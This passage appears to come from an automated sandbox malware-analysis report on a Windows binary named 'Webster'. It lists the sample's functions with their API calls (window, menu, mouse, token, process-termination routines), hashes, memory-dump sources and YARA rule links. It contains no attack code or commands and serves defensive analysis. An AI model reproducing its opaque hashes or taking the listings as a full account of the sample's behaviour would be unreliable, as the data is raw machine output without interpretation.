                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1101466143-0
                                                                                  • Opcode ID: 129f4210dedb0ca806a7fcc490faf24d748c02d0359cde2ac29662eb358ca25c
                                                                                  • Instruction ID: 62dade1475f904526b12f61dd2ea632cf207fde04bed9a58d28ebc3240006fd7
                                                                                  • Opcode Fuzzy Hash: 129f4210dedb0ca806a7fcc490faf24d748c02d0359cde2ac29662eb358ca25c
                                                                                  • Instruction Fuzzy Hash: B8513E75A00209EFDB14CF58C884AAAB7B8FF4D354B15856AED5ADB304D730E951CF90
                                                                                  Function 00AE29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE29FF
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2A4A
                                                                                  • IsMenu.USER32(00000000), ref: 00AE2A6A
                                                                                  • CreatePopupMenu.USER32 ref: 00AE2A9E
                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00AE2AFC
                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AE2B2D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3311875123-0
                                                                                  • Opcode ID: c5b310a49d2e9296afe2638984f6be74a36062b9371c30efaf4c234072052c97
                                                                                  • Instruction ID: 5cde94af807bad33392248ba1291aae65e37adbbeba1964e455525bf1204b023
                                                                                  • Opcode Fuzzy Hash: c5b310a49d2e9296afe2638984f6be74a36062b9371c30efaf4c234072052c97
                                                                                  • Instruction Fuzzy Hash: 7E51F070600389DFDF21CF6AC888BAEBBF9EF54314F144129E8119B2A1E7B09D44CB51
                                                                                  Function 00A81B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A81B76
                                                                                  • GetWindowRect.USER32(?,?), ref: 00A81BDA
                                                                                  • ScreenToClient.USER32(?,?), ref: 00A81BF7
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A81C08
                                                                                  • EndPaint.USER32(?,?), ref: 00A81C52
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                  • String ID:
                                                                                  • API String ID: 1827037458-0
                                                                                  • Opcode ID: 38fd5b48c16c20b8a3eaf6ef89721fda7748cd088f82df5e227da9408aea7a2b
                                                                                  • Instruction ID: 7866d329842e46055627cab028832c592b529016d56057ae1074af2087bf9226
                                                                                  • Opcode Fuzzy Hash: 38fd5b48c16c20b8a3eaf6ef89721fda7748cd088f82df5e227da9408aea7a2b
                                                                                  • Instruction Fuzzy Hash: D3419E74144204AFD710EF25CC88FBA7BFCFB56360F140669F995872A2CB709946DB61
                                                                                  Function 00B0BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00B477B0,00000000,014C4E08,?,?,00B477B0,?,00B0BC1A,?,?), ref: 00B0BD84
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00B0BDA8
                                                                                  • ShowWindow.USER32(00B477B0,00000000,014C4E08,?,?,00B477B0,?,00B0BC1A,?,?), ref: 00B0BE08
                                                                                  • ShowWindow.USER32(00000000,00000004,?,00B0BC1A,?,?), ref: 00B0BE1A
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00B0BE3E
                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B0BE61
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 642888154-0
                                                                                  • Opcode ID: cdeb5afe666866639409edc1f8c231c2ffef7c442205447abe104edea6e824f6
                                                                                  • Instruction ID: a3809c7c9c402eaf7991f2a8a8beb4a7259b7396175c08f56b1cc094872cb8e3
                                                                                  • Opcode Fuzzy Hash: cdeb5afe666866639409edc1f8c231c2ffef7c442205447abe104edea6e824f6
                                                                                  • Instruction Fuzzy Hash: 4641F634604145AFDB26DF28C489F95BFE1EB05314F1882F9EA588F2E2CB71A855CB51
                                                                                  Function 00AF7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00AF550C,?,?,00000000,00000001), ref: 00AF7796
                                                                                    • Part of subcall function 00AF406C: GetWindowRect.USER32(?,?), ref: 00AF407F
                                                                                  • GetDesktopWindow.USER32 ref: 00AF77C0
                                                                                  • GetWindowRect.USER32(00000000), ref: 00AF77C7
                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AF77F9
                                                                                    • Part of subcall function 00AE57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877
                                                                                  • GetCursorPos.USER32(?), ref: 00AF7825
                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AF7883
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4137160315-0
                                                                                  • Opcode ID: 212c698b17a3386228d0e0696f7199da42f55fde939e36205538b4ecc5da3980
                                                                                  • Instruction ID: bc277347153f81a557d854087b32b4b1847835aeef7455730b769fae90fd811e
                                                                                  • Opcode Fuzzy Hash: 212c698b17a3386228d0e0696f7199da42f55fde939e36205538b4ecc5da3980
                                                                                  • Instruction Fuzzy Hash: 8C31B272508309ABD720DF54D849FAFB7AAFF88354F004929F58597191CB70E958CBE2
                                                                                  Function 00AD9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
                                                                                    • Part of subcall function 00AD8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
                                                                                    • Part of subcall function 00AD8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
                                                                                    • Part of subcall function 00AD8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
                                                                                    • Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14
                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00AD904D), ref: 00AD9482
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AD948E
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00AD9495
                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AD94AE
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00AD904D), ref: 00AD94C2
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD94C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                  • String ID:
                                                                                  • API String ID: 3008561057-0
                                                                                  • Opcode ID: 1b9bd21465ea8a8e11ee3e3195bceed40ba834c578613816570eac4598cad47d
                                                                                  • Instruction ID: 5f78bd66db3e32afcd41ead27118adcf1ea4b8bee85552c7fbf39792a2db6f09
                                                                                  • Opcode Fuzzy Hash: 1b9bd21465ea8a8e11ee3e3195bceed40ba834c578613816570eac4598cad47d
                                                                                  • Instruction Fuzzy Hash: 7D11AFB1611604FFDB10AFA4CC09BEF7BA9EB45315F50801AF946A7211CB399941CB60
                                                                                  Function 00AD91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AD9200
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00AD9207
                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AD9216
                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00AD9221
                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AD9250
                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AD9264
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                  • String ID:
                                                                                  • API String ID: 1413079979-0
                                                                                  • Opcode ID: b7cf7d7a3138d66ec484d88a76a9e0e8d4037813e47eb625264dc43fffbb50a6
                                                                                  • Instruction ID: 351572198123ba09d62d7db9ac3e7106e11c91a817fb85ad230d843f5025b344
                                                                                  • Opcode Fuzzy Hash: b7cf7d7a3138d66ec484d88a76a9e0e8d4037813e47eb625264dc43fffbb50a6
                                                                                  • Instruction Fuzzy Hash: 3F11597250120EABDF019F94ED49FDE7BA9EF09304F048115FE05A2160C7B2DEA0EB60
                                                                                  Function 00ADC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00ADC34E
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ADC35F
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ADC366
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00ADC36E
                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ADC385
                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00ADC397
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: 95ca15c939626e9ce7fda7f3d78ea5fc7690128bb10ca61b13017a69c97e3d87
                                                                                  • Instruction ID: 6d29b1b8929c6781caeace71a443df91fbb1362e334959c6079b37d284e85869
                                                                                  • Opcode Fuzzy Hash: 95ca15c939626e9ce7fda7f3d78ea5fc7690128bb10ca61b13017a69c97e3d87
                                                                                  • Instruction Fuzzy Hash: F1014875E04319BBDF105BA59D49A9EBFB8EB48761F408066FA04EB340DA709D10CF50
                                                                                  Function 00B0C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
                                                                                    • Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
                                                                                    • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778
                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B0C57C
                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00B0C590
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C59E
                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00B0C5AE
                                                                                  • EndPath.GDI32(00000000), ref: 00B0C5BE
                                                                                  • StrokePath.GDI32(00000000), ref: 00B0C5CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                  • String ID:
                                                                                  • API String ID: 43455801-0
                                                                                  • Opcode ID: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
                                                                                  • Instruction ID: 13ea90aab4ffb870198f6bc1b95ba08c267436fa95d76af938e993643b9bc76f
                                                                                  • Opcode Fuzzy Hash: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
                                                                                  • Instruction Fuzzy Hash: 35111E7600010CBFDF12AF95DC89FDA7FADEB08354F048051B91856160DB71AE95DBA0
                                                                                  Function 00AA07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
                                                                                  • Instruction ID: e6b9146ef21e5d0cda0961027d71b4eac33549ddb6ca866d022f73448664e2c0
                                                                                  • Opcode Fuzzy Hash: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
                                                                                  • Instruction Fuzzy Hash: C6016CB09017597DE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                                  Function 00AE59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AE59B4
                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AE59CA
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00AE59D9
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59E8
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F2
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 839392675-0
                                                                                  • Opcode ID: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
                                                                                  • Instruction ID: 5f0c63ecda93286621af64d11a3a2350b7323c743a4103bc2b9a7632752b6fa4
                                                                                  • Opcode Fuzzy Hash: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
                                                                                  • Instruction Fuzzy Hash: AFF09032250158BFE3216B92AC0DEEF7B3CEFCBB11F404159FA00A2050DFE01A5186B5
                                                                                  Function 00AE77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00AE77FE
                                                                                  • EnterCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE780F
                                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00A8C2B6,?,?), ref: 00AE781C
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A8C2B6,?,?), ref: 00AE7829
                                                                                    • Part of subcall function 00AE71F0: CloseHandle.KERNEL32(00000000,?,00AE7836,?,00A8C2B6,?,?), ref: 00AE71FA
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE783C
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE7843
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
                                                                                  • Instruction ID: de08b84e8b315df8c232ee00878d109e2e9d45595fd7876bf220b09a77ef3fea
                                                                                  • Opcode Fuzzy Hash: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
                                                                                  • Instruction Fuzzy Hash: 4EF08232555212ABD7113B64EC8CAEF7739FF49302F944525F503A60A0DFF95891CBA0
                                                                                  Function 00AD954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AD9555
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00AD9561
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD956A
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD9572
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00AD957B
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD9582
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
                                                                                  • Instruction ID: 2d4c226933ea4cc0c2c9c4ee00ff66c4d6d1c7faedebc20d1ce05ee146b53cc2
                                                                                  • Opcode Fuzzy Hash: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
                                                                                  • Instruction Fuzzy Hash: C0E0E536114105BBDB012FE1EC0C99ABF39FF4A722B908220F225920B0CFB6A4B0DB50
                                                                                  Function 00AF8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF8CFD
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00AF8E0C
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF8F84
                                                                                    • Part of subcall function 00AE7B1D: VariantInit.OLEAUT32(00000000), ref: 00AE7B5D
                                                                                    • Part of subcall function 00AE7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00AE7B66
                                                                                    • Part of subcall function 00AE7B1D: VariantClear.OLEAUT32(00000000), ref: 00AE7B72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
